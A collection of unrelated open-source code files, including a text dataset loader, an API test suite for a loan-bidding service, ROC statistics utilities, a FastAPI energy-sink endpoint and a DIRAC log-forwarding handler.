TESTING_DOC_NUM\n elif dataset[\"dataset\"] == \"training\":\n data_tuples = get_data_tuples(os.path.join(dataset[\"path\"], 'train.data'))\n labels = get_labels(os.path.join(dataset[\"path\"], 'train.label'))\n DOC_NUM = TRAINING_DOC_NUM\n elif dataset[\"dataset\"] == \"testing\":\n data_tuples = get_data_tuples(os.path.join(dataset[\"path\"], 'test.data'))\n labels = get_labels(os.path.join(dataset[\"path\"], 'test.label'))\n DOC_NUM = TESTING_DOC_NUM\n else:\n raise ValueError(\n \"dataset must be 'all' or 'testing' or 'training', not \" +\n dataset[\"dataset\"])\n labels *= 1.0\n num_data = sum(1 for k in range(DOC_NUM) if labels[k] in dataset[\"labels\"])\n\n wc_sparse = csr_matrix((\n [data_tuples[i][2] * 1.0\n for i in range(len(data_tuples))\n if labels[data_tuples[i][0] - 1] in dataset[\"labels\"]],\n ([data_tuples[i][0] - 1\n for i in range(len(data_tuples))\n if labels[data_tuples[i][0] - 1] in dataset[\"labels\"]],\n [data_tuples[i][1] - 1\n for i in range(len(data_tuples))\n if labels[data_tuples[i][0] - 1] in dataset[\"labels\"]])),\n dtype=np.float32)\n nz_rows = np.unique(wc_sparse.nonzero()[0])\n wc_sparse = wc_sparse[nz_rows]\n labels = labels[nz_rows]\n tfidf_transformer = TfidfTransformer()\n tfidf = tfidf_transformer.fit_transform(wc_sparse)\n if dataset[\"SVD\"]:\n svd = TruncatedSVD(n_components=dataset[\"SVD_components\"])\n\n if \"seed\" in dataset:\n np.random.seed(dataset[\"seed\"])\n\n if dataset[\"permutation\"]:\n p = np.random.permutation(num_data)\n if dataset[\"SVD\"]:\n data = svd.fit_transform(tfidf[p])\n if dataset[\"zero_centering\"]:\n data = data - np.mean(data, axis=0)\n else:\n data = tfidf[p]\n labels = labels[p]\n else:\n if dataset[\"SVD\"]:\n data = svd.fit_transform(tfidf)\n if dataset[\"zero_centering\"]:\n data = data - np.mean(data, axis=0)\n else:\n data = tfidf\n return data, labels\n\n\ndef get_data_tuples(data_path):\n return np.array([[int(i) for i in x.split(' ')]\n for x in open(data_path).read().split('\\n')[:-1]])\n\n\ndef get_labels(labels_path):\n return np.array([int(x) for x in open(labels_path).read().split('\\n')[:-1]])\n","repo_name":"queqichao/FredholmLearning","sub_path":"data/news_group.py","file_name":"news_group.py","file_ext":"py","file_size_in_byte":3191,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"39701800062","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/12/15 15:49\n# @Author : Python12_秋\n# @Email : 793630871@qq.com\n# @File : A_09_Bidloan_test_case.py\n# @Software : PyCharm\n# @Explain : 竞标接口测试用例\n\nfrom ddt import ddt,data,unpack\nfrom common.http_requests_01 import HttpRequest\nfrom common.http_reading_excel_01 import DoExcel\nfrom common import http_path\nfrom common.Http_config import Reading\nfrom common.http_log import HttpLog\nfrom common.regular_expression import Regular\nfrom common.basic_data import Context\nfrom common.mysql import MysqlUtill\nimport unittest\nimport json\nfrom common.common_user import Login\n#创建日志对象,装载日志\nmy_log = HttpLog()\n#创建取配置对象\ncon = Reading(http_path.config_path_control)\n#获取需要的执行的测试用例ID\nconfig = con.get('CASE','button')\n#读取配置文件里面的URL地址\nconfig_url = con.get('URL','url_date')\n#读取测试数据,实例化测试数据对象\nexcel_date = DoExcel(http_path.case_path,config)\n#竞标\nexcel_date_bidLoan = excel_date.get_case('bidLoan')\n\n@ddt\nclass HttpCase(Login):\n#class HttpCase(unittest.TestCase):\n#金额:购买用户减少,项目账户增加\n#购买用户的流水记录\n#投资记录\n#项目金额减少\n @classmethod\n def setUpClass(cls):\n Login().test_login() #固定投资用户登录\n def setUp(self):\n global sql1,sql2,sql3,sql4,sql5,meny,mount,poject_Amount,normal_record,Income_record,record_all\n # 借款人用户金额\n sql1 = con.get(\"SQL\",\"Pay_LeaveAmount\")\n meny = MysqlUtill().get_fetch_one(sql=sql1)\n my_log.info(\"初始化数据--》借款人账户余额为:{}\".format(meny[\"LeaveAmount\"]))\n print(type(meny), meny)\n # 投资人用户金额\n sql2 = con.get(\"SQL\", \"Income_LeaveAmount\")\n mount = MysqlUtill().get_fetch_one(sql=sql2)\n print(type(mount), mount)\n try:\n if mount[\"LeaveAmount\"] == 0:\n my_log.info(\"初始化数据--》投资人账户余额为0 ,不允许投资,请先充值!\")\n else:\n my_log.info(\"初始化数据--》投资人账户余额为:{}\".format(mount[\"LeaveAmount\"]))\n except Exception as e:\n my_log.info(\"初始化数据--》投资人账户金额异常:{}\".format(e))\n raise e\n # 标的金额\n sql3 = con.get(\"SQL\",\"poject_Amount\")\n poject_Amount = MysqlUtill().get_fetch_one(sql=sql3)\n print(type(poject_Amount),poject_Amount)\n # 借款人用户流水记录\n sql4 = con.get(\"SQL\",\"normal_record\")\n normal_record = MysqlUtill().get_fetch_one(sql=sql4)\n # 投资人用户流水记录\n sql5 = con.get(\"SQL\", \"Income_record\")\n Income_record = MysqlUtill().get_fetch_one(sql=sql5)\n #对当前项目的投资记录\n sql6 = con.get(\"SQL\", \"Investment_record_all\")\n record_all = MysqlUtill().get_fetch_all(sql=sql6)\n\n # 加 * 号,去掉一层外套\n @data(*excel_date_bidLoan)\n def test_http_case(self,i):\n #对excel里面的正则进行替换\n date = Regular().regular(i.request_data) # 正则参数替换\n my_log.info('正在执行地{0}条用例; 用例名称:{1}; 用例说明:{2}; 用例接口:{3}'.\n format(i.case_id, i.case_name, i.case_rept, i.api_name))\n my_log.info('================检查url====================')\n my_log.info('url:{}'.format(config_url+i.url))\n my_log.info('================检查request_data====================')\n my_log.info('request_data:{}'.format(i.request_data))\n my_log.info('================检查替换后的request_data====================')\n my_log.info('request_data:{}'.format(date))\n my_log.info('================检查method====================')\n my_log.info('method:{}'.format(i.mathod))\n my_log.info('================检查api_name====================')\n my_log.info('api_name:{}'.format(i.api_name))\n my_log.info('================检查预期结果expected_data====================')\n my_log.info('expected_data:{}'.format(i.expected_data))\n if hasattr(Context,'cookies'): #因为第一次登陆没有cookies,需要判断\n cookies = getattr(Context,'cookies') #存在赋值给cookies\n else:\n cookies = None\n res = HttpRequest(config_url+i.url,json.loads(date),i.mathod,cookies)\n my_log.info('实际结果:{}'.format(res.get_json()))\n # 当cookie不为空时,把cookie写入反射类里面\n if res.get_cookies():\n setattr(Context,'cookies',res.get_cookies())\n my_log.info('=================开始断言==================')\n try:\n #断言判断实际结果与期望结果是否一致\n self.assertEqual(json.loads(i.expected_data)['code'],json.loads(res.get_text())['code'])\n Testresult = 'pass'\n if json.loads(res.get_text())['code'] == '10001': # 充值成功,进行数据库校验\n # 把竞标成功的金额写入映射Context里面\n if 'amount' not in eval(date): # 如果在date里面没有amount字段,直接赋值为0\n setattr(Context, \"leaveamount\", 0)\n else:\n setattr(Context, \"leaveamount\", eval(date)[\"amount\"])\n re_amount = getattr(Context, \"leaveamount\") # 读取反射里面竞标成功的金额\n #标的最新的金额\n # new_poject_Amount = MysqlUtill().get_fetch_one(sql=sql3)\n # po_Amount = int(poject_Amount[\"Amount\"]) - int(re_amount)\n # try:\n # if new_poject_Amount == '0':\n # my_log.info(\"数据库校验-->已满标\")\n # else:\n # self.assertEqual(int(new_poject_Amount[\"Amount\"]), po_Amount)\n # my_log.info(\"数据库校验-->最新可竞标的余额:{}\".format(new_poject_Amount[\"Amount\"]))\n # except BaseException as b:\n # my_log.info(\"数据库校验-->竞标余额异常:{}\".format(b))\n # raise b\n #借款人\n # new_meny = MysqlUtill().get_fetch_one(sql=sql1)\n # ne_men = int(meny[\"LeaveAmount\"]) + int(re_amount)\n # try:\n # self.assertEqual(int(new_meny[\"LeaveAmount\"]), ne_men)\n # my_log.info(\"数据库校验-->借款人的最新余额:{}\".format(new_meny[\"LeaveAmount\"]))\n # except BaseException as b:\n # my_log.info(\"数据库校验-->借款人余额异常:{}\".format(b))\n # raise b\n #投资人\n new_mount = MysqlUtill().get_fetch_one(sql=sql2)\n ne_moun = float(mount[\"LeaveAmount\"]) - float(re_amount[\"LeaveAmount\"])\n try:\n self.assertEqual(float(new_mount[\"LeaveAmount\"]), ne_moun) # 判断余额是否正确\n my_log.info(\"数据库校验-->投资人的最新余额:{}\".format(new_mount[\"LeaveAmount\"]))\n except BaseException as b:\n my_log.info(\"数据库校验-->投资人余额异常:{}\".format(b))\n raise b\n # 把借款人的流水记录\n new_normal_record = MysqlUtill().get_fetch_one(sql=sql4)\n if normal_record is None:\n my_log.info('数据库校验-->借款人未充值、提现,没有流水记录!')\n else:\n if normal_record['Id'] == new_normal_record['Id']:\n my_log.info('数据库校验-->借款人没有进行提现操作')\n elif new_normal_record['Id'] > normal_record['Id']:\n my_log.info('数据库校验-->借款人提现操作成功,流水记录ID是{}'.format(new_normal_record['Id']))\n else:\n raise AssertionError\n # 把投资人投资记录\n new_Income_record = MysqlUtill().get_fetch_one(sql=sql4)\n if Income_record is None:\n my_log.info('数据库校验-->投资人第一次投标')\n else:\n if Income_record['Id'] == new_Income_record['Id']:\n my_log.info('数据库校验-->投资人没有进行提现操作')\n elif new_Income_record['Id'] > Income_record['Id']:\n my_log.info('数据库校验-->投资人提现操作成功,流水记录ID是{}'.format(new_Income_record['Id']))\n else:\n raise AssertionError\n else: #竞标失败,数据校验\n new_poject_Amount = MysqlUtill().get_fetch_one(sql=sql3) # 最新的竞标金额\n try:\n self.assertEqual(int(poject_Amount[\"Amount\"]), new_poject_Amount[\"Amount\"])\n my_log.info(\"数据库校验-->最新可竞标的余额:{}\".format(poject_Amount[\"Amount\"]))\n except BaseException as b:\n my_log.info(\"数据库校验-->竞标余额异常:{}\".format(b))\n raise b\n # 借款人\n new_meny = MysqlUtill().get_fetch_one(sql=sql1)\n try:\n self.assertEqual(int(meny[\"LeaveAmount\"]), new_meny[\"LeaveAmount\"])\n my_log.info(\"数据库校验-->借款人的最新余额:{}\".format(new_meny[\"LeaveAmount\"]))\n except BaseException as b:\n my_log.info(\"数据库校验-->借款人余额异常:{}\".format(b))\n raise b\n # 投资人\n new_mount = MysqlUtill().get_fetch_one(sql=sql2)\n try:\n self.assertEqual(int(mount[\"LeaveAmount\"]), new_mount[\"LeaveAmount\"]) # 判断余额是否正确\n my_log.info(\"数据库校验-->投资人的最新余额:{}\".format(new_mount[\"LeaveAmount\"]))\n except BaseException as b:\n my_log.info(\"数据库校验-->投资人余额异常:{}\".format(b))\n raise b\n #把借款人的流水记录\n new_normal_record = MysqlUtill().get_fetch_one(sql=sql4)\n if normal_record is None:\n my_log.info('数据库校验-->借款人未充值、提现,没有流水记录!')\n else:\n if normal_record['Id'] == new_normal_record['Id']:\n my_log.info('数据库校验-->借款人最新流水记录{}'.format(new_normal_record['Id']))\n else:\n raise AssertionError\n # 投资人投资记录\n new_Income_record = MysqlUtill().get_fetch_one(sql=sql4)\n if Income_record is None:\n my_log.info('数据库校验-->投资人第一次投标')\n else:\n if Income_record['Id'] == new_Income_record['Id']:\n my_log.info('数据库校验-->投资人最新流水记录{}'.format(new_Income_record['Id']))\n else:\n raise AssertionError\n\n except Exception as e:\n Testresult = 'failed'\n my_log.error('断言错误:{0}'.format(e))\n raise e\n finally:\n my_log.info('resultd的值是:{0}'.format(Testresult))\n my_log.info('=================结束断言==================')\n #写入实际结果actual和result值\n excel_date.write_by_case_id(sheet_name='bidLoan', case_id=i.case_id,\n actual=res.get_text(), result=Testresult)\n\n# if __name__ == '__main__':\n# unittest.main()\n# 金额为小数时,如何避免重复判断","repo_name":"9914/Python12-api-test_9913","sub_path":"Interface_API/A_09_Bidloan_test_case.py","file_name":"A_09_Bidloan_test_case.py","file_ext":"py","file_size_in_byte":11996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31413791608","text":"def prepare_roc_data(results):\n results.sort()\n sum_true = sum(1 for x in results if x[1])\n sum_false = len(results) - sum_true\n\n tp_scale = 1.0 / (sum_true or 1)\n fp_scale = 1.0 / (sum_false or 1)\n return results, sum_true, sum_false, tp_scale, fp_scale\n\n\ndef draw_roc_curve(results, label='ROC', arrows=1, label_offset=0):\n import matplotlib.pyplot as plt\n\n results, true_positives, false_positives, \\\n tp_scale, fp_scale = prepare_roc_data(results)\n\n tp = []\n fp = []\n half = 0\n #distance from best\n dfb_p = (0, 0, 0)\n dfb_d = 99\n # distance from worst\n dfw_p = (0, 0, 0)\n dfw_d = 0\n # distance from diagonal\n dfd_p = (0, 0, 0)\n dfd_d = 0\n p95_p = None\n n95_p = (1.0, 1.0, 1.0)\n\n for result in results:\n score = result[0]\n target = result[1]\n false_positives -= not target\n true_positives -= target\n x = false_positives * fp_scale\n y = true_positives * tp_scale\n half += score < 0.5\n p = (x, y, score)\n\n if arrows > 1:\n #distance from worst\n d = (1 - x) * (1 - x) + y * y\n if d > dfw_d:\n dfw_p = p\n dfw_d = d\n #distance from best\n d = x * x + (1 - y) * (1 - y)\n if d < dfb_d:\n dfb_p = p\n dfb_d = d\n #distance from diagonal\n d = y - x\n if d > dfd_d:\n dfd_p = p\n dfd_d = d\n\n #positive 95\n if p95_p is None and y > 20.0 * x:\n p95_p = p\n\n # negative 95\n if 1.0 - x > 20.0 * (1.0 - y):\n n95_p = p\n\n fp.append(x)\n tp.append(y)\n\n if half < len(fp):\n hx = (fp[half - 1] + fp[half]) * 0.5\n hy = (tp[half - 1] + tp[half]) * 0.5\n else:\n hx = fp[half - 1]\n hy = tp[half - 1]\n\n fp.reverse()\n tp.reverse()\n plt.plot(fp, tp, label=label)\n if arrows:\n x, y, s = n95_p\n offset = label_offset * -0.03\n plt.annotate(\"95%% negative %s %.2g\" % (label, s), (x, y),\n (0.7, 0.7 + offset),\n arrowprops={'width':1, 'color': '#0088aa'},\n )\n if p95_p is not None:\n x, y, s = p95_p\n plt.annotate(\"95%% positive %s %.2g\" % (label, s), (x, y),\n (0.2, 0.2 + offset),\n arrowprops={'width':1, 'color': '#8800aa'},\n )\n plt.annotate(\"0.5 %s\" % label, (hx, hy), (0.4, 0.4 + offset),\n arrowprops={'width':1, 'color': '#00cc00'})\n x, y, s = dfd_p\n plt.annotate(\"furthest from diagonal %s %.2g\" % (label, s), (x, y),\n (0.5, 0.5 + offset),\n arrowprops={'width':1, 'color': '#aa6600'},\n )\n if arrows > 1:\n x, y, s = dfw_p\n plt.annotate(\"furthest from all bad %s %.2g\" % (label, s), (x, y),\n (0.3, 0.3 + offset),\n arrowprops={'width':1, 'color': '#00cccc'},\n )\n x, y, s = dfb_p\n plt.annotate(\"closest to all good %s %.2g\" % (label, s), (x, y),\n (0.6, 0.6 + offset),\n arrowprops={'width':1, 'color': '#cc0000'},\n )\n\n\ndef _calc_stats(results, include_scores=False):\n from math import sqrt, log\n (results, sum_true, sum_false,\n tp_scale, fp_scale) = prepare_roc_data(results)\n auc = 0\n sum_dfd = 0 #distance from diagonal (but signed)\n max_dfd = 0\n best_dfd_score = 0\n sum_dfc2 = 0 #distance from centre, squared\n sum_dfb, min_dfb = 0, 1e99 #distance from best\n pos_95 = 0\n neg_95 = 0\n briar = 0\n cross_entropy = 0\n pos_95_score = 1\n neg_95_score = 0\n min_dfb_score = 0\n\n px, py = 0, 0 # previous position for area calculation\n true_positives, false_positives = sum_true, sum_false\n best_tp = true_positives\n best_fp = false_positives\n for score, target in results:\n false_positives -= not target\n true_positives -= target\n x = false_positives * fp_scale\n y = true_positives * tp_scale\n\n #area under ROC curve\n dx = x - px\n dy = y - py\n auc += px * dy # bottom rectangle\n auc += dx * dy * 0.5 # top triangle\n #XXX AUC never actually has a top triangle -- every step is\n # either vertical or horizontal. There ought to be a better way.\n px = x\n py = y\n\n #distance from diagonal (needs scaling by .707)\n d = y - x\n sum_dfd += d\n if d > max_dfd:\n max_dfd = d\n best_tp = true_positives\n best_fp = false_positives\n best_dfd_score = score\n\n # distance from centre, squared\n # (x - 0.5) * (x - 0.5) + (y - 0.5) * (y - 0.5)\n d = x * x - x + y * y - y + 0.5\n sum_dfc2 += d\n\n #distance from best corner\n d = sqrt((1.0 - y) * (1.0 - y) + x * x)\n sum_dfb += d\n if d < min_dfb:\n min_dfb = d\n min_dfb_score = score\n\n # 95% positive and negative\n # intersections with 1:20 lines from the end corners\n if dx == 0 and y > 20.0 * x and not pos_95:\n pos_95 = y\n pos_95_score = score\n\n if 1.0 - x > 20.0 * (1.0 - y):\n neg_95 = 1.0 - x\n neg_95_score = score\n\n # briar score\n briar += (score - target) * (score - target)\n error = max(score if target else (1.0 - score), 1e-20)\n\n cross_entropy -= log(error, 2.0)\n\n #do the last little bit of area under curve\n dx = 1.0 - px\n dy = 1.0 - py\n auc += px * dy # bottom rectangle\n auc += dx * dy * 0.5 # top triangle\n\n briar /= len(results)\n cross_entropy /= len(results)\n\n # Matthews correlation coefficient/ Phi coefficient at ROC tip\n best_tn = sum_false - best_fp\n best_fn = sum_true - best_tp\n mcc_bottom = ((best_tp + best_fp) *\n (best_tp + best_fn) *\n (best_tn + best_fp) *\n (best_tn + best_fp))\n if mcc_bottom:\n mcc_top = best_tp * best_tn - best_fp * best_fn\n mcc = mcc_top / sqrt(mcc_bottom)\n else:\n mcc = 0\n\n #f1 = precision * sensitivity / (precision + sensitivity)\n if best_tp:\n best_p = best_tp / float(best_tp + best_fp)\n best_s = best_tp / float(sum_true)\n f1 = best_p * best_s / (best_p + best_s)\n else:\n f1 = 0\n\n #calculating mean and variance\n mean_data = [[0,0,0], [0,0,0]]\n for score, target in results:\n mean, n, nvar = mean_data[target]\n n += 1\n delta = score - mean\n mean += delta / n\n nvar += delta * (score - mean)\n mean_data[target] = [mean, n, nvar]\n\n mean_true, n, nvar = mean_data[1]\n if n == 0:\n n = 1.0\n var_true = nvar / n\n mean_false, n, nvar = mean_data[0]\n if n == 0:\n n = 1.0\n var_false = nvar / n\n if var_true + var_false:\n dprime = (mean_true - mean_false) / sqrt(0.5 * (var_true + var_false))\n else:\n #zero variance is in practice a sign of degeneracy\n dprime = 0.0\n sqrt_half = 0.7071067811865475244\n d = {\n 'mean_dfd' : sum_dfd / len(results) * sqrt_half,\n 'max_dfd': max_dfd * sqrt_half,\n 'rms_dfc': sqrt(sum_dfc2 / len(results)),\n 'mean_dfb': sum_dfb / len(results),\n 'min_dfb': min_dfb,\n 'auc': auc,\n 'dprime': dprime,\n 'mcc': mcc,\n 'f1': f1,\n 'pos_95': pos_95,\n 'neg_95': neg_95,\n 'briar': briar,\n 'cross_entropy': cross_entropy,\n }\n if include_scores:\n d['best_dfd_score'] = best_dfd_score\n d['pos_95_score'] = pos_95_score\n d['neg_95_score'] = neg_95_score\n d['min_dfb_score'] = min_dfb_score\n\n return d\n\ndef calc_stats(results, presence_results=None, presence_gt=None, presence_i=0,\n include_scores=False):\n stats = _calc_stats([x[:2] for x in results], include_scores=include_scores)\n\n if presence_results is not None:\n p1 = zip([x[presence_i] for x in presence_results], presence_gt)\n presence_stats = _calc_stats(p1, include_scores=include_scores)\n for k, v in presence_stats.iteritems():\n stats['p.' + k] = v\n\n return stats\n\ndef actually_show_roc(title='ROC'):\n import matplotlib.pyplot as plt\n plt.axes().set_aspect('equal')\n plt.title(title, verticalalignment='bottom')\n plt.xlabel('false positive rate')\n plt.ylabel('true positive rate')\n plt.legend(loc='lower right')\n plt.show()\n\ndef draw_presence_roc(scores, label='presence', label_every=0.0):\n import matplotlib.pyplot as plt\n scores, true_positives, false_positives, \\\n tp_scale, fp_scale = prepare_roc_data(scores)\n tp = []\n fp = []\n half = 0\n if label_every:\n step = len(scores) * label_every\n else:\n step = 1e555\n next_label = step\n labels = []\n\n for i, st in enumerate(scores):\n score, target = st\n false_positives -= not target\n true_positives -= target\n x = false_positives * fp_scale\n y = true_positives * tp_scale\n half += score < 0.5\n if i > next_label:\n labels.append((score, x, y))\n next_label += step\n fp.append(x)\n tp.append(y)\n\n fp.reverse()\n tp.reverse()\n colour = plt.plot(fp, tp, label=label)[0].get_color()\n if label_every:\n for score, x, y in labels:\n plt.annotate(\"%.2f\" % score, xy=(x, y), xytext=(-3, 2), ha='right',\n textcoords='offset points', color=colour)\n\n\ndef calc_core_stats(scores_and_truth):\n \"\"\"Calculate AUC from a list of tuples containing score and ground\n truth. Like this:\n\n [(0.434, True), (0.1, False), (0.9, True),...]\n \"\"\"\n results = sorted((s, int(bool(t))) for s, t in scores_and_truth)\n n_true = sum(x[1] for x in results)\n n_false = len(results) - n_true\n\n true_positives, false_positives = n_true, n_false\n true_negatives = 0\n tp_scale = 1.0 / (n_true or 1)\n fp_scale = 1.0 / (n_false or 1)\n px, py = 1.0, 1.0 # previous position for area calculation\n auc = 1.0\n dfd = 0.0\n dfd_y = 0\n dfd_x = 0\n dfd_score = 0.0\n prev_score = -1.0\n max_n_correct = 0\n for score, truth in results:\n false_positives -= 1 - truth\n true_positives -= truth\n true_negatives += 1 - truth\n if prev_score != score:\n x = false_positives * fp_scale\n y = true_positives * tp_scale\n auc += (px + x) * 0.5 * (y - py)\n px = x\n py = y\n prev_score = score\n d = y - x\n n_correct = true_positives + true_negatives\n\n if d > dfd:\n dfd = d\n dfd_score = score\n\n if n_correct > max_n_correct:\n max_n_correct = n_correct\n correct_score = score\n\n auc += px * 0.5 * - py\n dfd *= 0.5 ** 0.5\n max_correct = max_n_correct / float(len(results))\n return auc, dfd, dfd_score, max_correct, correct_score\n","repo_name":"douglasbagnall/recur","sub_path":"classify_stats.py","file_name":"classify_stats.py","file_ext":"py","file_size_in_byte":11155,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"52"} +{"seq_id":"14404025841","text":"def solution(num_list, n):\n list_max = len(num_list)\n answer = []\n temp_list = []\n count = 0\n for i in num_list:\n temp_list.append(i)\n count += 1\n if count == n:\n answer.append(temp_list)\n temp_list = []\n count = 0\n\n return answer\n\n\ndef solution2(num_list, n):\n answer, i = [], 0\n for i in range(0, len(num_list), n):\n answer.append(num_list[i:i+n])\n return answer\n\n\nprint(solution2([1, 2, 3, 4, 5, 6, 7, 8], 2))\n","repo_name":"Ohjinn/algo-py","sub_path":"programmers/basic100/2차원으로_만들기.py","file_name":"2차원으로_만들기.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6926095018","text":"from typing import List\n\nfrom fastapi import APIRouter, Depends, HTTPException, status\nfrom sqlalchemy.orm import Session\n\nfrom ensysmod import crud, model, schemas\nfrom ensysmod.api import deps, permissions\n\nrouter = APIRouter()\n\n\n@router.get(\"/\", response_model=List[schemas.EnergySink])\ndef get_all_energy_sinks(db: Session = Depends(deps.get_db),\n current: model.User = Depends(deps.get_current_user),\n skip: int = 0,\n limit: int = 100) -> List[schemas.EnergySink]:\n \"\"\"\n Retrieve all energy sinks.\n \"\"\"\n return crud.energy_sink.get_multi(db=db, skip=skip, limit=limit)\n\n\n@router.post(\"/\", response_model=schemas.EnergySink,\n responses={409: {\"description\": \"EnergySink with same name already exists.\"}})\ndef create_sink(request: schemas.EnergySinkCreate,\n db: Session = Depends(deps.get_db),\n current: model.User = Depends(deps.get_current_user)):\n \"\"\"\n Create a new energy sink.\n \"\"\"\n dataset = crud.dataset.get(db=db, id=request.ref_dataset)\n if dataset is None:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f\"Dataset {request.ref_dataset} not found!\")\n\n permissions.check_modification_permission(db, user=current, dataset_id=request.ref_dataset)\n\n existing = crud.energy_sink.get_by_dataset_and_name(db=db, dataset_id=request.ref_dataset, name=request.name)\n if existing is not None:\n raise HTTPException(status_code=status.HTTP_409_CONFLICT,\n detail=f\"EnergySink {request.name} already for dataset {request.ref_dataset} exists!\")\n\n # Check if energy commodity exists\n commodity = crud.energy_commodity.get_by_dataset_and_name(db=db, dataset_id=request.ref_dataset,\n name=request.commodity)\n if commodity is None:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=f\"EnergyCommodity {request.commodity} in dataset {request.ref_dataset} not found!\")\n\n return crud.energy_sink.create(db=db, obj_in=request)\n","repo_name":"NOWUM/EnSysMod","sub_path":"ensysmod/api/endpoints/energy_sinks.py","file_name":"energy_sinks.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"39233610850","text":"\"\"\"\nLogCollector logging backend\n\"\"\"\n\n# The LogCollectorHandler class must be an exact copy of the LogCollectorHandler class\n# in LogCollectorHandler.py file that has been tested with LogCollectorClient.py.\n# Requires that python-json-logger is installed:\n# $ pip2 install python-json-logger\n\nfrom DIRAC.FrameworkSystem.private.standardLogging.LogLevels import LogLevels\nfrom DIRAC.Resources.LogBackends.AbstractBackend import AbstractBackend\nfrom DIRAC.FrameworkSystem.private.standardLogging.Formatter.JsonFormatter import JsonFormatter\nfrom DIRAC.Core.Security.Locations import getCAsLocation, getHostCertificateAndKeyLocation\nfrom DIRAC import gLogger\n\nfrom collections import deque\n\nimport threading\nimport datetime\nimport logging\nimport socket\nimport select\nimport struct\nimport time\nimport ssl\nimport sys\nimport io\nimport os\nimport re\n\n\nclass LogCollectorHandler(logging.Handler, threading.Thread):\n \"\"\"\n LogCollectorHandler is a custom handler for logging. It sends logging records to a LogCollector server.\n\n This handler requires that the formatter is the JsonFormatter.\n \"\"\"\n\n def __init__(self, addresses, privKey, certif, caCerts, minLevel, name, enabled) :\n \"\"\"\n Initialization of the LogCollectorHandler.\n\n :param addresses : list of LoqCollector addresses of the form \":\".\n Connection will always be attempted from first to last.\n examples: \"toto.example.com:3000\" or \"123.45.67.89:3000\".\n :param privKey : string file name of the PEM encoded private key of the client.\n :param certif : string file name of the PEM encoded certificate of the client.\n :param caCerts : string file name of the PEM encoded certificate authority list to check the server.\n :param minLevel : integer number of minimum log level accepted by this handler. \n :param name : string client name to pass in connection init.\n :param enabled : bool set to True if the handler is enabled.\n \"\"\"\n logging.Handler.__init__(self)\n threading.Thread.__init__(self, name=\"LogCollectorHandler\")\n self.addrList = [a for a in [a.strip() for a in addresses.split(\",\")] if a != \"\"]\n self.addresses = addresses\n self.privKey = privKey\n self.certif = certif\n self.caCerts = caCerts\n self.minLevel = minLevel\n self.level = minLevel\n self.name = name\n self.enabled = enabled\n self.log = gLogger.getSubLogger('LogCollectorBackend')\n self.sock = None\n self.msgQueue = deque() # json encoded messages to send\n self.msgToAck = deque() # json encoded messages waiting acknowledgement\n self.maxNbrMsg = 10000 # max number of messages in queue + toAck\n self.queueCond = threading.Condition()\n self.packet = io.BytesIO()\n self.maxPktLen = 1500\n self.buf = bytearray(1)\n self.daemon = True\n self.start()\n\n\n def setLevel(self, level):\n \"\"\"\n Set the logging level of this handler, but not below self.minLevel.\n \"\"\"\n self.level = level if level > self.minLevel else self.minLevel\n\n\n def emit(self, record):\n \"\"\"\n Queue the record for asynchronous sending to the LogCollector.\n\n The oldest logging message in the queue is dropped when the queue overflows.\n\n :params record: log record object\n \"\"\"\n if not self.enabled:\n return\n # skip log records emitted by the LogCollectorBackend to avoid endless loops\n if hasattr(record, 'customname') and record.customname.endswith('LogCollectorBackend'):\n return\n record.utime = int(round(time.time()*1000000))\n self.queueCond.acquire()\n self.msgQueue.appendleft(self.format(record))\n if len(self.msgQueue) + len(self.msgToAck) > self.maxNbrMsg:\n jmsg = self.msgQueue.pop()\n self.queueCond.release()\n self.log.verbose(\"queue is full, drop message: \"+jmsg)\n self.queueCond.acquire()\n self.queueCond.notifyAll()\n self.queueCond.release()\n\n\n def run(self):\n self.log.info(\"start LogCollector thread\")\n self.queueCond.acquire()\n while (1):\n while len(self.msgQueue) == 0:\n self.queueCond.wait(5) # TODO: check if the 5 sec timeout is needed\n \n while len(self.msgQueue) > 0 or len(self.msgToAck) > 0:\n if self.sock == None:\n self.queueCond.release()\n self.__connect() # returns when connected\n self.queueCond.acquire()\n \n input = [self.sock]\n output = []\n if self.__fillPacketToSend():\n output = [self.sock]\n self.queueCond.release()\n readable, writable, exceptional = select.select(input, output, input, 5) # TODO wait forever or tmo ?\n self.queueCond.acquire()\n\n if exceptional:\n self.queueCond.release()\n self.log.verbose(\"connection closed by logCollector (exceptional)\")\n self.queueCond.acquire()\n self.__resetConnection()\n continue\n\n if readable:\n try:\n acks = self.sock.read()\n if not acks:\n self.queueCond.release()\n self.log.verbose(\"connection closed by logCollector (read 0)\")\n self.queueCond.acquire()\n self.__resetConnection()\n continue\n except Exception as e:\n self.queueCond.release()\n self.log.verbose(\"read acknowledgments failed:\" + str(e))\n self.queueCond.acquire()\n self.__resetConnection()\n continue\n for _ in acks:\n self.msgToAck.pop()\n\n if writable:\n try:\n self.sock.sendall(self.packet.getvalue())\n self.__clearPacket()\n except Exception as e:\n self.queueCond.release()\n self.log.verbose(\"send packet of messages failed:\" + str(e))\n self.queueCond.acquire()\n self.__resetConnection()\n continue\n\n \n def __connect(self):\n \"\"\"\n Connect to a LogCollector, trying addresses in sequence from first to last.\n If failed, wait 10 seconds, and retry. \n requires queueCond is NOT acquired to avoid deadlock. \n \"\"\"\n while 1:\n for address in self.addrList:\n self.log.info(\"try connecting to\", address)\n if self.__connectTo(address):\n self.log.info(\"connection open to \" + address)\n return\n self.log.info(\"failed connecting to {}, waiting 15 seconds\".format(self.addresses))\n time.sleep(15)\n \n\n def __connectTo(self, address):\n \"\"\"\n Try connecting to the LogCollector at the given address.\n\n :return: bool True if succeed, and False otherwise.\n \"\"\"\n try:\n srvName, port = address.split(\":\")\n # resolve again in case the IP addresss of srvName changed\n srvIP = socket.gethostbyname(srvName)\n except Exception as e:\n self.log.verbose(\"open connection failed:\", str(e))\n return False\n\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n 